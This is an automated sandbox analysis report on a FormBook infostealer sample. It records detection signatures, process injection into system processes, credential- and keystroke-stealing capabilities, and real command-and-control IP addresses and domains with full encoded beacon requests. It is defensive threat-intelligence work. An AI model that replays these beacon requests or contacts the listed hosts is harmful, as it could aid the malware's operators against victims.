Edit tour

Windows Analysis Report
J1VpshZJfm.exe

Overview

General Information

Sample name:	J1VpshZJfm.exe renamed because original name is a hash value
Original sample name:	f1a074590a5ab17256abba47cb364ef182c4082f08d63a22f0cb21f438f72aa1.exe
Analysis ID:	1587952
MD5:	21e2a1f6597267e8bbda9239986a5df4
SHA1:	5d952371ef4d3f6b0a861c7b5fb28e19ca588b24
SHA256:	f1a074590a5ab17256abba47cb364ef182c4082f08d63a22f0cb21f438f72aa1
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

J1VpshZJfm.exe (PID: 4272 cmdline: "C:\Users\user\Desktop\J1VpshZJfm.exe" MD5: 21E2A1F6597267E8BBDA9239986A5DF4)

svchost.exe (PID: 4296 cmdline: "C:\Users\user\Desktop\J1VpshZJfm.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

UNUqLBRwwpkr.exe (PID: 5528 cmdline: "C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

ctfmon.exe (PID: 2300 cmdline: "C:\Windows\SysWOW64\ctfmon.exe" MD5: 1B19D302D7FFA3D0901B3D990A4E8E12)

systeminfo.exe (PID: 5380 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)

UNUqLBRwwpkr.exe (PID: 5512 cmdline: "C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2456 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1845812137.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3431429866.0000000004550000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1851615513.00000000033B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3430419586.00000000008A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3431547878.00000000045A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3431711821.0000000002780000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1852595076.0000000003C00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\J1VpshZJfm.exe", CommandLine: "C:\Users\user\Desktop\J1VpshZJfm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\J1VpshZJfm.exe", ParentImage: C:\Users\user\Desktop\J1VpshZJfm.exe, ParentProcessId: 4272, ParentProcessName: J1VpshZJfm.exe, ProcessCommandLine: "C:\Users\user\Desktop\J1VpshZJfm.exe", ProcessId: 4296, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\J1VpshZJfm.exe", CommandLine: "C:\Users\user\Desktop\J1VpshZJfm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\J1VpshZJfm.exe", ParentImage: C:\Users\user\Desktop\J1VpshZJfm.exe, ParentProcessId: 4272, ParentProcessName: J1VpshZJfm.exe, ProcessCommandLine: "C:\Users\user\Desktop\J1VpshZJfm.exe", ProcessId: 4296, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:52:08.318615+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49707	103.117.135.13	80	TCP
2025-01-10T19:52:48.826085+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49858	185.151.30.223	80	TCP
2025-01-10T19:53:02.114668+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49946	199.59.243.228	80	TCP
2025-01-10T19:53:15.750180+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49986	46.38.243.234	80	TCP
2025-01-10T19:53:29.774196+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49990	176.57.65.76	80	TCP
2025-01-10T19:53:57.032431+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49994	209.74.79.42	80	TCP
2025-01-10T19:54:11.098053+0100	2855465	1	A Network Trojan was detected	192.168.2.11	49998	198.2.214.227	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T19:52:41.172928+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49811	185.151.30.223	80	TCP
2025-01-10T19:52:43.738102+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49828	185.151.30.223	80	TCP
2025-01-10T19:52:46.290405+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49844	185.151.30.223	80	TCP
2025-01-10T19:52:54.489504+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49895	199.59.243.228	80	TCP
2025-01-10T19:52:57.039329+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49912	199.59.243.228	80	TCP
2025-01-10T19:52:59.565959+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49930	199.59.243.228	80	TCP
2025-01-10T19:53:07.902035+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49972	46.38.243.234	80	TCP
2025-01-10T19:53:11.400053+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49984	46.38.243.234	80	TCP
2025-01-10T19:53:13.078571+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49985	46.38.243.234	80	TCP
2025-01-10T19:53:21.749900+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49987	176.57.65.76	80	TCP
2025-01-10T19:53:24.277708+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49988	176.57.65.76	80	TCP
2025-01-10T19:53:27.117650+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49989	176.57.65.76	80	TCP
2025-01-10T19:53:48.544480+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49991	209.74.79.42	80	TCP
2025-01-10T19:53:51.111413+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49992	209.74.79.42	80	TCP
2025-01-10T19:53:53.620814+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49993	209.74.79.42	80	TCP
2025-01-10T19:54:03.931185+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49995	198.2.214.227	80	TCP
2025-01-10T19:54:05.948298+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49996	198.2.214.227	80	TCP
2025-01-10T19:54:08.534074+0100	2855464	1	A Network Trojan was detected	192.168.2.11	49997	198.2.214.227	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: J1VpshZJfm.exe	Virustotal: Detection: 63%			Perma Link
Source: J1VpshZJfm.exe	ReversingLabs: Detection: 78%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1845812137.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431429866.0000000004550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1851615513.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3430419586.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3431547878.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3431711821.0000000002780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1852595076.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: J1VpshZJfm.exe

Joe Sandbox ML: detected

Source: J1VpshZJfm.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: sysinfo.pdb source: svchost.exe, 00000002.00000003.1803255600.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806615054.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ctfmon.pdb source: UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sysinfo.pdbGCTL source: svchost.exe, 00000002.00000003.1803255600.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806615054.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UNUqLBRwwpkr.exe, 00000004.00000002.3430840251.00000000006FE000.00000002.00000001.01000000.00000005.sdmp, UNUqLBRwwpkr.exe, 00000009.00000002.3430430682.00000000006FE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: ctfmon.pdbGCTL source: UNUqLBRwwpkr.exe, 00000004.00000002.3431122912.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: J1VpshZJfm.exe, 00000000.00000003.1584867996.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1584048216.0000000004280000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1592401830.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729318637.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727339443.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004890000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1845119326.0000000004538000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1852230516.00000000046E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: J1VpshZJfm.exe, 00000000.00000003.1584867996.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1584048216.0000000004280000.00000004.00001000.00020000.00000000.sdmp, J1VpshZJfm.exe, 00000000.00000003.1592401830.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1729318637.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727339443.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1851970797.000000000369E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004890000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1845119326.0000000004538000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3431791952.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000003.1852230516.00000000046E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: systeminfo.exe, 00000006.00000002.3430481412.0000000000919000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3432253939.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918430505.000000000340C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2193231609.0000000013FFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: systeminfo.exe, 00000006.00000002.3430481412.0000000000919000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3432253939.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000000.1918430505.000000000340C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2193231609.0000000013FFC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00EF445A
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFC6D1 FindFirstFileW,FindClose,	0_2_00EFC6D1
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00EFC75C
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EFEF95
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00EFF0F2
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EFF3F3
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00EF37EF
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00EF3B12
Source: C:\Users\user\Desktop\J1VpshZJfm.exe	Code function: 0_2_00EFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00EFBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49707 -> 103.117.135.13:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49811 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49828 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49844 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49858 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49912 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49930 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49895 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49946 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49987 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49986 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49992 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49994 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49989 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49996 -> 198.2.214.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49972 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49998 -> 198.2.214.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49985 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49984 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49993 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49988 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49997 -> 198.2.214.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.11:49990 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49991 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.11:49995 -> 198.2.214.227:80

Source: Joe Sandbox View	IP Address: 209.74.79.42 209.74.79.42
Source: Joe Sandbox View	IP Address: 199.59.243.228 199.59.243.228
Source: Joe Sandbox View	IP Address: 46.38.243.234 46.38.243.234

Source: Joe Sandbox View	ASN Name: KYIT-AS-APKuaiyunInformationTechnologyCOLtdCN KYIT-AS-APKuaiyunInformationTechnologyCOLtdCN
Source: Joe Sandbox View	ASN Name: TELINEABA TELINEABA
Source: Joe Sandbox View	ASN Name: PEGTECHINCUS PEGTECHINCUS
Source: Joe Sandbox View	ASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\J1VpshZJfm.exe

Code function: 0_2_00F022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00F022EE

Source: global traffic	HTTP traffic detected: GET /oo53/?ERYLmh=w7zSaK21vx4u10sWVMnfmIW6aSu6YucXytn5RpNm+gMsUo2HNotrI4MxDLqt2VVD72DPDfflNvbSi1F9wjFvsc9CjUP+BpgRjgEeDTY+44qn6Defd5ku6J4=&X6H8=IvQt7 HTTP/1.1Host: www.dffmdogmyftftv2e.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Source: global traffic	HTTP traffic detected: GET /i0t0/?X6H8=IvQt7&ERYLmh=55JAKRHCVhRFz4rSCivB82QuzdQ/baakOPrCijpU7kQxygbYqFNZJ0DsoOfetVDx1igJEubFEiJe3C+c5zJONaTpvnJNfmhjgkKiBmVn8klxaL2GeVp9+f4= HTTP/1.1Host: www.gern.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Source: global traffic	HTTP traffic detected: GET /11n4/?ERYLmh=Q6B4Vv6H/HmLDGJrwI0OhVXjXZHTCh42S0IrLUtTNR3dM5L2Pp6KnadiPCYNEEaz6Rg+ZfDzycGjYNn5/pubR8oyDYBu1hbKKFItG0JEeDKr9yYwr/OIGls=&X6H8=IvQt7 HTTP/1.1Host: www.sql.danceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Source: global traffic	HTTP traffic detected: GET /w0kg/?ERYLmh=gdZftRfibRTMAdgnKmd9KVRywM/mYMR5KQU/CHcOE1UQTVmABoHrRdFggPQ+NAJ+Xf61Ad5PxgFkNU5U/GGJ56kA4RPcdSHkeJmiJ2vWzoHi2nE9toLKgQQ=&X6H8=IvQt7 HTTP/1.1Host: www.lmueller.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Source: global traffic	HTTP traffic detected: GET /z9pt/?ERYLmh=oYJAeG9WNTlP8utNbygd6NUbjqahrsf74AAgPHnCceKwZcFYRj1oATkeULJilqWH5VW1cS3gEyaLINk5XaCCgtw4AU7Y7avcI6zeRyEIpqmuKn0rd3BmnQw=&X6H8=IvQt7 HTTP/1.1Host: www.newbh.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
